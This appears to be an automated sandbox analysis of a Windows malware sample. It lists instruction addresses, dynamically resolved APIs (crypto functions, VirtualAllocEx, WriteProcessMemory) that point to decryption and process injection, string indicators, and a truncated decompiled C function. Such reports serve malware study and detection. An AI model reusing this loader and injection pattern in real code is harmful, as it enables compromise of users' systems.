                                                0x004ef622
                                                0x004ef628
                                                0x004ef632
                                                0x004ef632
                                                0x004ef616
                                                0x004ef592
                                                0x004ef595
                                                0x004ef59f
                                                0x004ef5a4
                                                0x004ef5a9
                                                0x004ef5b0
                                                0x004ef5b5
                                                0x004ef5c2
                                                0x004ef5c5
                                                0x004ef5d0
                                                0x004ef5d5
                                                0x004ef5e0
                                                0x004ef5e0
                                                0x004ef637
                                                0x004ef642
                                                0x004ef64f
                                                0x004ef654
                                                0x004ef659
                                                0x004ef65e
                                                0x004ef669
                                                0x004ef66e
                                                0x004ef673
                                                0x004ef686
                                                0x004ef691
                                                0x004ef694
                                                0x004ef69f
                                                0x004ef6a5
                                                0x004ef6b1
                                                0x004ef6b1
                                                0x004ef6b6
                                                0x004ef6c0
                                                0x004ef6cc
                                                0x004ef6d1
                                                0x004ef6dc
                                                0x004ef6ef
                                                0x004ef702
                                                0x004ef715
                                                0x004ef728
                                                0x004ef735
                                                0x004ef73c
                                                0x004ef73f
                                                0x004ef745
                                                0x004ef748
                                                0x004ef74b
                                                0x004ef751
                                                0x004ef75b
                                                0x004ef761
                                                0x004ef778
                                                0x004ef77b
                                                0x004ef78b
                                                0x004ef795
                                                0x004ef77d
                                                0x004ef784
                                                0x004ef784
                                                0x004ef763
                                                0x004ef763
                                                0x004ef76b
                                                0x004ef76b
                                                0x004ef79a
                                                0x004ef7a5
                                                0x004ef7aa
                                                0x004ef7af
                                                0x004ef7c2
                                                0x004ef7c9
                                                0x004ef7cc
                                                0x004ef7d0
                                                0x004ef7d2
                                                0x004ef7e3
                                                0x004ef7e8
                                                0x004ef7f0
                                                0x004ef7f0
                                                0x004ef7fb
                                                0x004ef803
                                                0x004ef816
                                                0x004ef81b
                                                0x004ef823
                                                0x004ef826
                                                0x004ef82e
                                                0x004ef833
                                                0x004ef83e
                                                0x004ef843
                                                0x004ef84e
                                                0x004ef861
                                                0x004ef86c
                                                0x004ef876
                                                0x004ef879
                                                0x004ef881
                                                0x004ef88d
                                                0x004ef895
                                                0x004ef896
                                                0x004ef89c
                                                0x004ef8aa
                                                0x004ef8af
                                                0x004ef8b4
                                                0x004ef8c7
                                                0x004ef8da
                                                0x004ef8e7
                                                0x004ef8ee
                                                0x004ef8f1
                                                0x004ef8f7
                                                0x004ef8fa
                                                0x004ef902
                                                0x004ef905
                                                0x004ef908
                                                0x004ef90e
                                                0x004ef913
                                                0x004ef91a
                                                0x004ef921
                                                0x004ef923
                                                0x004ef926
                                                0x004ef932
                                                0x004ef937
                                                0x004ef93f
                                                0x004ef93f
                                                0x004ef94c
                                                0x004ef957
                                                0x004ef95d
                                                0x004ef965
                                                0x004ef965
                                                0x004ef96a
                                                0x004ef972
                                                0x004ef975
                                                0x004ef97d
                                                0x004ef990
                                                0x004ef995
                                                0x004ef99a
                                                0x004ef9a1
                                                0x004ef9a8
                                                0x004efa04
                                                0x004efa04
                                                0x004efa09
                                                0x004efa0e
                                                0x004efa19
                                                0x004efa24
                                                0x004efa37
                                                0x004efa44
                                                0x004efa4e
                                                0x004efa51
                                                0x004efa5c
                                                0x004efa61
                                                0x004efa69
                                                0x004efa6c
                                                0x004efa74
                                                0x004efa79
                                                0x004efa7e
                                                0x004efa89
                                                0x004efa9c
                                                0x004efaa1
                                                0x004efaa9
                                                0x004efaaf
                                                0x004efab6
                                                0x004efac0
                                                0x004efac5
                                                0x004efacf
                                                0x004efada
                                                0x004efadd
                                                0x004efae5
                                                0x004efaf1
                                                0x004efb1a
                                                0x004efb1b
                                                0x004efb24
                                                0x004efb29
                                                0x004efaf3
                                                0x004efaf3
                                                0x004efafd
                                                0x004efb03
                                                0x004efb05
                                                0x004efb10
                                                0x004efb10
                                                0x004efb03
                                                0x004efb2e
                                                0x004efb39
                                                0x004efb4c
                                                0x004efb5f
                                                0x004efb66
                                                0x004efb69
                                                0x004efb69
                                                0x004efb6e
                                                0x004efb73
                                                0x004efb7e
                                                0x004efb83
                                                0x004efb88
                                                0x004efb8d
                                                0x004efb90
                                                0x004efb96
                                                0x004efb9e
                                                0x004efba3
                                                0x004efbae
                                                0x004efbb3
                                                0x004efbb8
                                                0x004efbbd
                                                0x004efbc5
                                                0x004efbc8
                                                0x004efbd0
                                                0x004efbd5
                                                0x004efbdf
                                                0x004efbf2
                                                0x004efbf9
                                                0x004efbfc
                                                0x004efc01
                                                0x004efc06
                                                0x004efc0b
                                                0x004efc10
                                                0x004efc15
                                                0x004efc1b
                                                0x004efc20
                                                0x004efc2a
                                                0x004efc2a
                                                0x004efc45
                                                0x004efc57
                                                0x004efc5d
                                                0x004efc47
                                                0x004efc4d
                                                0x004efc4d
                                                0x004efc62
                                                0x004efc67
                                                0x004efc6c
                                                0x004efc71
                                                0x004efc77
                                                0x004efca3
                                                0x004efca8
                                                0x004efc79
                                                0x004efc81
                                                0x004efc86
                                                0x004efc88
                                                0x004efc8d
                                                0x004efc91
                                                0x004efc97
                                                0x004efc9c
                                                0x004efc9c
                                                0x004efc86
                                                0x004efcad
                                                0x004efcb2
                                                0x004efcb6
                                                0x004efcbc
                                                0x004efcc1
                                                0x004efcc6
                                                0x004efcd1
                                                0x004efcd6
                                                0x004efce1
                                                0x004efcf4
                                                0x004efd01
                                                0x004efd0a
                                                0x004efd0d
                                                0x004efd15
                                                0x004efd1a
                                                0x004efd22
                                                0x004efd32
                                                0x004efd37
                                                0x004efd3f
                                                0x004efd52
                                                0x004efd65
                                                0x004efd78
                                                0x004efd86
                                                0x004efd88
                                                0x004efd8d
                                                0x004efd92
                                                0x004efd97
                                                0x004efd9c
                                                0x004efda1
                                                0x004efda7
                                                0x004efdb6
                                                0x004efdbb
                                                0x004efdc0
                                                0x004efdd1
                                                0x004efdd1
                                                0x004efdd6
                                                0x004efdc2
                                                0x004efdc9
                                                0x004efdc9
                                                0x004efdc0
                                                0x004efda7
                                                0x004efdd9
                                                0x004efde4
                                                0x004efde9
                                                0x004efdee
                                                0x004efdf3
                                                0x004efdfe
                                                0x004efe11
                                                0x004efe1c
                                                0x004efe1f
                                                0x004efe24
                                                0x004efe31
                                                0x004efe34
                                                0x004efe3c
                                                0x004efe41
                                                0x004efe46
                                                0x004efe47
                                                0x004efe4d
                                                0x004efe53
                                                0x004efe5d
                                                0x004efe62
                                                0x004efe6d
                                                0x004efe80
                                                0x004efe8b
                                                0x004efe90
                                                0x004efe97
                                                0x004efeb2
                                                0x004efeb2
                                                0x004efebd
                                                0x004efec5
                                                0x004efec9
                                                0x004efed7
                                                0x004efedc
                                                0x004efee6
                                                0x004efeeb
                                                0x004efefa
                                                0x004eff01
                                                0x004f04b1
                                                0x004f04b1
                                                0x004f04b9
                                                0x004f04be
                                                0x004f04c5
                                                0x004f053a
                                                0x004f053a
                                                0x004f0544
                                                0x004f0549
                                                0x004f0554
                                                0x004f055e
                                                0x004f0573
                                                0x004f057f
                                                0x004f057f
                                                0x004f0584
                                                0x004f058c
                                                0x004f058f
                                                0x004f0597
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f04c7
                                                0x004f04c7
                                                0x004f04c7
                                                0x004f04ca
                                                0x004f04cf
                                                0x004f04d4
                                                0x004f04de
                                                0x004f04e3
                                                0x004f04e8
                                                0x004f04ee
                                                0x004f0511
                                                0x004f0513
                                                0x004f051a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f051c
                                                0x004f051c
                                                0x004f051c
                                                0x004f051f
                                                0x004f0529
                                                0x004f052e
                                                0x00000000
                                                0x004f051c
                                                0x004f04f2
                                                0x004f04f5
                                                0x004f0503
                                                0x004f0508
                                                0x004f050b
                                                0x00000000
                                                0x004f0534
                                                0x004f0534
                                                0x00000000
                                                0x004f04c7
                                                0x004eff09
                                                0x004eff0c
                                                0x004eff10
                                                0x004eff12
                                                0x004eff15
                                                0x004eff1a
                                                0x004eff1f
                                                0x004eff24
                                                0x004eff25
                                                0x004eff2b
                                                0x004eff31
                                                0x004eff3b
                                                0x004eff3b
                                                0x004eff48
                                                0x004eff4d
                                                0x004eff52
                                                0x004eff57
                                                0x004eff5d
                                                0x004eff62
                                                0x004eff65
                                                0x004eff70
                                                0x004eff75
                                                0x004eff7d
                                                0x004eff7d
                                                0x004eff82
                                                0x004eff87
                                                0x004eff8c
                                                0x004eff91
                                                0x004effa1
                                                0x004effb0
                                                0x004effc3
                                                0x004effca
                                                0x004effd1
                                                0x004f0016
                                                0x004f001d
                                                0x004f0022
                                                0x004f002c
                                                0x004f0031
                                                0x004f0039
                                                0x004f003e
                                                0x004f0043
                                                0x004f0048
                                                0x004f004d
                                                0x004f0052
                                                0x004f0057
                                                0x004f005d
                                                0x004f0071
                                                0x004f0076
                                                0x004f0076
                                                0x004f007c
                                                0x004f005f
                                                0x004f006a
                                                0x004f006a
                                                0x004f0084
                                                0x004f0085
                                                0x004f008e
                                                0x004f0098
                                                0x004f00ab
                                                0x004f00be
                                                0x004f00c9
                                                0x004f00d2
                                                0x004f00d5
                                                0x004f00da
                                                0x004f00df
                                                0x004f00e4
                                                0x004f00e9
                                                0x004f00f1
                                                0x004f0104
                                                0x004f0109
                                                0x004f0111
                                                0x004f011b
                                                0x004f011e
                                                0x004f0129
                                                0x004f012e
                                                0x004f0138
                                                0x004f013d
                                                0x004f0142
                                                0x004f0147
                                                0x004f014c
                                                0x004f0152
                                                0x004f0154
                                                0x004f0159
                                                0x004f015e
                                                0x004f0163
                                                0x004f0169
                                                0x004f017d
                                                0x004f0182
                                                0x004f0183
                                                0x004f018c
                                                0x004f0196
                                                0x004f016b
                                                0x004f016b
                                                0x004f0176
                                                0x004f0176
                                                0x004f0169
                                                0x004f019b
                                                0x004f01a5
                                                0x004f01b5
                                                0x004f01c8
                                                0x004f01cd
                                                0x004f01d2
                                                0x004f01d9
                                                0x004f01dc
                                                0x004f01e2
                                                0x004f01e8
                                                0x004f01ec
                                                0x004f01fa
                                                0x004f0206
                                                0x004f020b
                                                0x004f020e
                                                0x004f020e
                                                0x004f0214
                                                0x004f0219
                                                0x004f021d
                                                0x004f022b
                                                0x004f0230
                                                0x004f023b
                                                0x004f0240
                                                0x004f024b
                                                0x004f0250
                                                0x004f0255
                                                0x004f025f
                                                0x004f0264
                                                0x004f026d
                                                0x004f0272
                                                0x004f0278
                                                0x004f027f
                                                0x004f0284
                                                0x004f0289
                                                0x004f0293
                                                0x004f0298
                                                0x004f029d
                                                0x004f02a2
                                                0x004f02a7
                                                0x004f02ad
                                                0x004f02af
                                                0x004f02b4
                                                0x004f02b8
                                                0x004f02be
                                                0x004f02c8
                                                0x004f02c8
                                                0x004f02d8
                                                0x004f02dd
                                                0x004f02eb
                                                0x004f02f0
                                                0x004f02f5
                                                0x004f02fa
                                                0x004f030a
                                                0x004f030c
                                                0x004f0316
                                                0x004f0316
                                                0x004f031f
                                                0x00000000
                                                0x004f0325
                                                0x004f0325
                                                0x004f032a
                                                0x004f0335
                                                0x004f033b
                                                0x004f033e
                                                0x004f0346
                                                0x004f0360
                                                0x004f0368
                                                0x004f0368
                                                0x004f037b
                                                0x004f0386
                                                0x004f0389
                                                0x004f0394
                                                0x004f0399
                                                0x004f03a1
                                                0x004f03a4
                                                0x004f03ac
                                                0x004f03b4
                                                0x004f03b7
                                                0x004f03bc
                                                0x004f03cb
                                                0x004f03d3
                                                0x004f03d7
                                                0x004f03dd
                                                0x004f03e7
                                                0x004f03e7
                                                0x004f03ef
                                                0x004f03f6
                                                0x004f03fb
                                                0x004f040e
                                                0x004f0415
                                                0x004f0418
                                                0x004f0418
                                                0x004f041b
                                                0x004f0423
                                                0x004f0426
                                                0x004f042a
                                                0x004f0487
                                                0x004f0487
                                                0x004f0492
                                                0x004f0497
                                                0x004f049f
                                                0x004f04a4
                                                0x004f04ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f042c
                                                0x004f042c
                                                0x004f042c
                                                0x004f043a
                                                0x004f0442
                                                0x004f0449
                                                0x004f044e
                                                0x004f0455
                                                0x004f045c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f045e
                                                0x004f045e
                                                0x004f045e
                                                0x004f0461
                                                0x004f0466
                                                0x004f046b
                                                0x004f0471
                                                0x004f0471
                                                0x004f047c
                                                0x004f0481
                                                0x00000000
                                                0x004f042c
                                                0x004effd3
                                                0x004effd3
                                                0x004effd3
                                                0x004effd3
                                                0x004effd3
                                                0x004effd6
                                                0x004effe0
                                                0x004effe5
                                                0x004f0005
                                                0x004f000d
                                                0x004effe7
                                                0x004effea
                                                0x004effee
                                                0x004efff4
                                                0x004efffe
                                                0x004efffe
                                                0x004f0010
                                                0x00000000
                                                0x004effd3
                                                0x004efe99
                                                0x004efe99
                                                0x004efe99
                                                0x004efe9c
                                                0x004efea7
                                                0x004efeac
                                                0x004efeac
                                                0x00000000
                                                0x004efe99
                                                0x004ef9aa
                                                0x004ef9aa
                                                0x004ef9aa
                                                0x004ef9af
                                                0x004ef9b6
                                                0x004ef9b8
                                                0x004ef9c3
                                                0x004ef9c3
                                                0x004ef9d2
                                                0x004ef9d9
                                                0x004ef9db
                                                0x004ef9db
                                                0x004ef9de
                                                0x004ef9e9
                                                0x004ef9ee
                                                0x004ef9db
                                                0x004ef9f4
                                                0x004ef9f9
                                                0x004ef9fe
                                                0x004ef9fe
                                                0x00000000
                                                0x004ef9aa
                                                0x004ef9a8
                                                0x004ef37c
                                                0x004ef383
                                                0x004ef40e
                                                0x004ef40e
                                                0x004ef418
                                                0x004ef41d
                                                0x004ef422
                                                0x004ef427
                                                0x004ef432
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004ef389
                                                0x004ef389
                                                0x004ef389
                                                0x004ef38f
                                                0x004ef396
                                                0x004ef3a0
                                                0x004ef3a0
                                                0x004ef3aa
                                                0x004ef3d5
                                                0x004ef3d5
                                                0x004ef3df
                                                0x004ef3ac
                                                0x004ef3ba
                                                0x004ef3c5
                                                0x004ef3d0
                                                0x004ef3d0
                                                0x004ef3f2
                                                0x004ef3f7
                                                0x004ef3ff
                                                0x004ef404
                                                0x00000000
                                                0x004ef27c
                                                0x004ef27c
                                                0x004ef27c
                                                0x004ef28c
                                                0x004ef291
                                                0x004ef294
                                                0x004ef2b9
                                                0x004ef2b9
                                                0x004ef2bc
                                                0x004ef296
                                                0x004ef296
                                                0x004ef29b
                                                0x004ef29c
                                                0x004ef2a5
                                                0x004ef2af
                                                0x004ef2af
                                                0x004ef2bf
                                                0x004ef2ca
                                                0x004ef2cf
                                                0x004ef2cf
                                                0x00000000
                                                0x004ef27c
                                                0x004ef27a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004ef007
                                                0x004ef007
                                                0x004ef007
                                                0x004ef018
                                                0x004ef01d
                                                0x004ef023
                                                0x00000000
                                                0x004eed91
                                                0x004eed91
                                                0x004eed91
                                                0x004eed97
                                                0x004eed9e
                                                0x004eeda8
                                                0x004eeda8
                                                0x004eedaf
                                                0x004eedb1
                                                0x004eedb6
                                                0x004eedb6
                                                0x004eedbb
                                                0x004eedc0
                                                0x004eedc7
                                                0x004eedce
                                                0x004eedd0
                                                0x004eedd0
                                                0x004eedda
                                                0x004eeddd
                                                0x004eedd0
                                                0x004eede3
                                                0x004eeded
                                                0x004eedf2
                                                0x00000000
                                                0x004eed91
                                                0x004eed8f
                                                0x004eeb44
                                                0x004eea9a
                                                0x004eea9f
                                                0x004eeaa4
                                                0x004eeaa9
                                                0x004eeaae
                                                0x004eeab6
                                                0x004eeab9
                                                0x004eeac1
                                                0x004eeac6
                                                0x004eead0
                                                0x004eead5
                                                0x004eeada
                                                0x004eeae0
                                                0x00000000
                                                0x00000000
                                                0x004eeae4
                                                0x004eeaeb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004eeaed
                                                0x004eeaed
                                                0x004eeaed
                                                0x004eeaf0
                                                0x004eeaf5
                                                0x004eeafa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004ee9a1
                                                0x004ee9a1
                                                0x004ee9a1
                                                0x004ee9a9
                                                0x004ee9be
                                                0x004ee9c8
                                                0x004ee9c8
                                                0x004ee9cb
                                                0x004ee9d0
                                                0x004ee9d5
                                                0x004ee9dd
                                                0x004ee9e2
                                                0x004ee9ed
                                                0x004ee9f2
                                                0x004ee9fd
                                                0x004eea02
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(advapi32.dll,004FC554,00000000,004F065B,?,00000000,004F07FA), ref: 004EEA7E
                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004EEB53
                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004EEBD0
                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 004EEC9B
                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 004EED7C
                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 004EEEBA
                                                • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004EEECD
                                                • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004EEFDF
                                                • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004EF097
                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004EF0F9
                                                • GetProcAddress.KERNEL32(00000000,GetCurrentHwProfileW), ref: 004EF15F
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,GetCurrentHwProfileW,0000000D,00000000,CryptDestroyHash,0BC3E19A,00000000,CryptGetHashParam,004FC554,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptDecrypt), ref: 004EF16E
                                                • GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004EF267
                                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004EF33E
                                                • GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 004EF351
                                                • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 004EF562
                                                • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 004EF681
                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 004EF6EA
                                                • GetProcAddress.KERNEL32(00000000,FreeLibrary), ref: 004EF6FD
                                                • GetProcAddress.KERNEL32(00000000,HeapFree), ref: 004EF710
                                                • GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 004EF7BD
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004EF85C
                                                • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 004EF8C2
                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 004EF8D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: 2$?$AppLaunch.exe$CNBJOP78.DLL$CloseHandle$CreateFileW$CreateProcessW$CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$DeleteFileW$EtwEventWriteStartScenario$FreeLibrary$GetCurrentHwProfileW$GetCurrentProcess$GetLocalManagedApplicationData$GetNativeSystemInfo$GetProcAddress$GetProcessHeap$GetShortPathNameW$GetTempPathW$GetWindowsDirectoryW$HeapFree$InvalidateRect$IsBadReadPtr$LoadLibraryA$NlsData0020.dll$NlsLexicons081a.dll$NtQueryVirtualMemory$R$ReadFile$ReadProcessMemory$RtlAllocateHeap$RtlDecompressBuffer$RtlGetLastWin32Error$RtlSetLastWin32Error$SHGetPathFromIDListW$SHGetSpecialFolderLocation$SetFileAttributesW$SetLocaleInfoA$System.ComponentModel.DataAnnotations.ni.dll$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtect$WMPhoto.dll$WriteFile$WriteProcessMemory$ZwClearEvent$advapi32.dll$cfgbkend.dll$ipconfig.exe$kernel32.dll$ntdll.dll$shell32.dll$spwizeng.dll$tssysprep.dll$wdscore.dll
                                                • API String ID: 667068680-2459333046
                                                • Opcode ID: 6e08dfd0d88ddc9699ce075d64fa0759abac629e821831dcae6dc328a8b4c4a5
                                                • Instruction ID: 2bbd392d19f757f3a687120a25d96ce2b5ea6e8b65b94c8f12cd8589c0bc2803
                                                • Opcode Fuzzy Hash: 6e08dfd0d88ddc9699ce075d64fa0759abac629e821831dcae6dc328a8b4c4a5
                                                • Instruction Fuzzy Hash: 5513B375910249AFDB00DFAAE985A6D7BF1FB08306B10483AE504E7371D379A960CF6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004F0FBC(BYTE* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                				BYTE* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				char _v17;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				long* _v96;
                                                				long* _v100;
                                                				long* _v104;
                                                				long* _v108;
                                                				int _v112;
                                                				BYTE* _v116;
                                                				BYTE* _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				int _v132;
                                                				char _v136;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				char _v148;
                                                				intOrPtr _v152;
                                                				intOrPtr _v156;
                                                				signed int _v160;
                                                				intOrPtr _v164;
                                                				intOrPtr _v168;
                                                				signed int _v172;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _t973;
                                                				signed int _t977;
                                                				signed int _t981;
                                                				signed int _t983;
                                                				signed int _t984;
                                                				signed int _t989;
                                                				signed int _t999;
                                                				int _t1011;
                                                				signed int _t1012;
                                                				signed int _t1032;
                                                				signed int _t1036;
                                                				signed int _t1037;
                                                				signed int _t1038;
                                                				signed int _t1039;
                                                				signed int _t1043;
                                                				int _t1049;
                                                				signed int _t1051;
                                                				signed int _t1054;
                                                				signed int _t1073;
                                                				signed int _t1074;
                                                				signed int _t1075;
                                                				signed int _t1076;
                                                				signed int _t1077;
                                                				signed int _t1078;
                                                				signed int _t1079;
                                                				signed int _t1084;
                                                				signed int _t1085;
                                                				signed int _t1086;
                                                				signed int _t1087;
                                                				signed int _t1090;
                                                				int _t1095;
                                                				signed int _t1104;
                                                				signed int _t1111;
                                                				signed int _t1112;
                                                				signed int _t1114;
                                                				signed int _t1116;
                                                				signed int _t1129;
                                                				signed int _t1130;
                                                				signed int _t1131;
                                                				signed int _t1133;
                                                				signed int _t1137;
                                                				signed int _t1141;
                                                				signed int _t1145;
                                                				signed int _t1146;
                                                				signed int _t1152;
                                                				signed int _t1158;
                                                				signed int _t1161;
                                                				signed int _t1163;
                                                				signed int _t1167;
                                                				intOrPtr _t1168;
                                                				signed int _t1172;
                                                				signed int _t1173;
                                                				signed int _t1175;
                                                				signed int _t1177;
                                                				signed int _t1178;
                                                				signed int _t1179;
                                                				signed int _t1189;
                                                				signed int _t1221;
                                                				signed int _t1223;
                                                				signed int _t1227;
                                                				signed int _t1229;
                                                				signed int _t1230;
                                                				signed int _t1237;
                                                				signed int _t1238;
                                                				signed int _t1241;
                                                				signed int _t1244;
                                                				signed int _t1248;
                                                				int _t1254;
                                                				signed int _t1258;
                                                				signed int _t1260;
                                                				signed int _t1262;
                                                				signed int _t1269;
                                                				signed int _t1270;
                                                				signed int _t1277;
                                                				signed int _t1279;
                                                				signed int _t1280;
                                                				signed int _t1282;
                                                				signed int _t1283;
                                                				signed int _t1288;
                                                				signed int _t1290;
                                                				signed int _t1292;
                                                				signed int _t1293;
                                                				signed int _t1296;
                                                				int _t1314;
                                                				void* _t1316;
                                                				signed int _t1319;
                                                				signed int _t1321;
                                                				signed int _t1322;
                                                				signed int _t1323;
                                                				void* _t1328;
                                                				signed int _t1330;
                                                				signed int _t1332;
                                                				signed int _t1349;
                                                				signed int _t1350;
                                                				signed int _t1352;
                                                				signed int _t1353;
                                                				signed int _t1355;
                                                				signed int _t1357;
                                                				signed int _t1359;
                                                				signed int _t1367;
                                                				signed int _t1368;
                                                				signed int _t1375;
                                                				signed int _t1382;
                                                				signed int _t1383;
                                                				signed int _t1385;
                                                				signed int _t1386;
                                                				signed int _t1388;
                                                				signed int _t1401;
                                                				signed int _t1411;
                                                				signed int _t1412;
                                                				signed int _t1414;
                                                				signed int _t1415;
                                                				signed int _t1416;
                                                				signed int _t1417;
                                                				signed int _t1418;
                                                				signed int _t1419;
                                                				signed int _t1421;
                                                				signed int _t1430;
                                                				signed int _t1431;
                                                				signed int _t1433;
                                                				signed int _t1434;
                                                				signed int _t1435;
                                                				void* _t1440;
                                                				signed int _t1441;
                                                				signed int _t1445;
                                                				intOrPtr _t1449;
                                                				signed int _t1455;
                                                				signed int _t1457;
                                                				signed int _t1459;
                                                				signed int _t1461;
                                                				signed int _t1462;
                                                				signed int _t1464;
                                                				signed int _t1466;
                                                				signed int _t1468;
                                                				int _t1473;
                                                				signed int _t1478;
                                                				signed int _t1481;
                                                				signed int _t1484;
                                                				signed int _t1494;
                                                				signed int _t1498;
                                                				signed int _t1500;
                                                				signed int _t1501;
                                                				signed int _t1507;
                                                				signed int _t1509;
                                                				signed int _t1510;
                                                				signed int _t1512;
                                                				signed int _t1514;
                                                				signed int _t1515;
                                                				signed int _t1521;
                                                				signed int _t1524;
                                                				signed int _t1528;
                                                				signed int _t1529;
                                                				signed int _t1536;
                                                				signed int _t1538;
                                                				signed int _t1539;
                                                				signed int _t1540;
                                                				signed int _t1542;
                                                				signed int _t1544;
                                                				intOrPtr _t1548;
                                                				signed int _t1562;
                                                				signed int _t1564;
                                                				signed int _t1565;
                                                				signed int _t1572;
                                                				signed int _t1585;
                                                				signed int _t1586;
                                                				signed int _t1588;
                                                				signed int _t1592;
                                                				signed int _t1594;
                                                				signed int _t1603;
                                                				signed int _t1605;
                                                				signed int _t1606;
                                                				signed int _t1607;
                                                				signed int _t1608;
                                                				signed int _t1609;
                                                				signed int _t1611;
                                                				signed int _t1613;
                                                				signed int _t1621;
                                                				signed int _t1625;
                                                				signed int _t1629;
                                                				signed int _t1632;
                                                				signed int _t1635;
                                                				signed int _t1646;
                                                				signed int _t1654;
                                                				signed int _t1657;
                                                				signed int _t1658;
                                                				signed int _t1661;
                                                				signed int _t1664;
                                                				signed int _t1665;
                                                				signed int _t1668;
                                                				signed int _t1678;
                                                				signed int _t1683;
                                                				signed int _t1685;
                                                				signed int _t1686;
                                                				signed int _t1687;
                                                				signed int _t1691;
                                                				signed int _t1693;
                                                				signed int _t1695;
                                                				void* _t1697;
                                                				signed int _t1699;
                                                				signed int _t1706;
                                                				signed int _t1724;
                                                				signed int _t1732;
                                                				signed int _t1734;
                                                				signed int _t1741;
                                                				signed int _t1749;
                                                				signed int _t1756;
                                                				signed int _t1758;
                                                				signed int _t1760;
                                                				signed int _t1766;
                                                				signed int _t1771;
                                                				signed int _t1773;
                                                				signed int _t1776;
                                                				signed int _t1779;
                                                				signed int _t1780;
                                                				signed int _t1785;
                                                				signed int _t1787;
                                                				signed int _t1788;
                                                				signed int _t1795;
                                                				signed int _t1808;
                                                				signed int _t1815;
                                                				signed int _t1823;
                                                				signed int _t1824;
                                                				signed int _t1830;
                                                				signed int _t1847;
                                                				signed int _t1848;
                                                				signed int _t1851;
                                                				signed int _t1852;
                                                				signed int _t1859;
                                                				signed int _t1865;
                                                				signed int _t1884;
                                                				signed int _t1894;
                                                				signed int _t1897;
                                                				signed int _t1906;
                                                				signed int _t1910;
                                                				signed int _t1915;
                                                				signed int _t1916;
                                                				intOrPtr _t1920;
                                                				intOrPtr _t1921;
                                                				intOrPtr _t1926;
                                                				intOrPtr _t1929;
                                                				intOrPtr _t1949;
                                                				signed int _t1953;
                                                				intOrPtr _t1956;
                                                				intOrPtr _t1973;
                                                				intOrPtr _t1975;
                                                				signed int _t1976;
                                                				intOrPtr _t1981;
                                                				signed int _t1990;
                                                				signed int _t1993;
                                                				signed int _t2004;
                                                				signed int _t2009;
                                                				intOrPtr _t2018;
                                                				void* _t2022;
                                                				void* _t2023;
                                                				intOrPtr* _t2024;
                                                				void* _t2030;
                                                				void* _t2045;
                                                				void* _t2048;
                                                				void* _t2062;
                                                				void* _t2064;
                                                				void* _t2081;
                                                				void* _t2093;
                                                				void* _t2103;
                                                				void* _t2136;
                                                				void* _t2138;
                                                				void* _t2139;
                                                				void* _t2140;
                                                				void* _t2150;
                                                				void* _t2159;
                                                
                                                				_t2022 = _t2023;
                                                				_t2024 = _t2023 + 0xffffff50;
                                                				_push(__ebx);
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_push(_t2022);
                                                				_push(0x4f31f8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t2024;
                                                				_t973 = E004FEF38; // 0xc3c34fdc
                                                				_t1910 = E004FEF2C; // 0xa1d900
                                                				if(_t973 -  *0x4fef04 > _t1910 -  *0x4fef04) {
                                                					_v84 = 0;
                                                					while(_v84 < 0xe) {
